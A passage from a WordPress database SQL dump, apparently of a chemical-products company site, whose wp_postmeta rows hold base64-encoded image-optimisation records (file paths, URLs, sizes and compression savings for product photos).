aHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjU3NCwidGltZSI6MTQ4MzU3NzYzNywiaWQiOjEwNDh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29810, 1047, 'wpfc_optimisation_reduction', '1926239'); 
INSERT INTO `wp_postmeta` VALUES (29811, 1047, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEuanBnIiwid2lkdGgiOjQ4MDAsImhlaWdodCI6MTcyOCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEuanBnIiwicmVkdWN0aW9uIjoxOTI2MjI1LCJ0aW1lIjoxNDgzNTc3NjQ4LCJpZCI6IjEwNDcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzY1MSwiaWQiOjEwNDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS04MDB4Mjg4LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6Mjg4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtODAweDI4OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTgwMHgyODguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NjUzLCJpZCI6MTA0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTc2OHgyNzYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjoyNzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS03Njh4Mjc2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtNzY4eDI3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc2NTYsImlkIjoxMDQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMTYwMHg1NzYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6NTc2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMTYwMHg1NzYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0xNjAweDU3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc2NjAsImlkIjoxMDQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzY2MiwiaWQiOjEwNDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NjY1LCJpZCI6MTA0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc2NjcsImlkIjoxMDQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzY3MCwiaWQiOjEwNDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc2NzIsImlkIjoxMDQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3Njc1LCJpZCI6MTA0N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzY3NywiaWQiOjEwNDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzc2NzksImlkIjoxMDQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc3NjgyLCJpZCI6MTA0N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTEtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2UxLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NzY4NCwiaWQiOjEwNDd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29812, 1046, 'wpfc_optimisation_reduction', '14420'); 
INSERT INTO `wp_postmeta` VALUES (29813, 1046, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NzY4OSwiaWQiOiIxMDQ2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjYwMiwidGltZSI6MTQ4MzU3NzY5MywiaWQiOjEwNDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMjk4LCJ0aW1lIjoxNDgzNTc3Njk4LCJpZCI6MTA0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEwOTUsInRpbWUiOjE0ODM1Nzc3MDIsImlkIjoxMDQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo0MDY0LCJ0aW1lIjoxNDgzNTc3NzA3LCJpZCI6MTA0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUwNywidGltZSI6MTQ4MzU3NzcxMCwiaWQiOjEwNDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjUsInRpbWUiOjE0ODM1Nzc3MTQsImlkIjoxMDQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDk0LCJ0aW1lIjoxNDgzNTc3NzE3LCJpZCI6MTA0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEyOTMsInRpbWUiOjE0ODM1Nzc3MjEsImlkIjoxMDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMwMDAtc2VyaWVzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MzEsInRpbWUiOjE0ODM1Nzc3MjQsImlkIjoxMDQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDAwLXNlcmllcy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAwMC1zZXJpZXMtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLz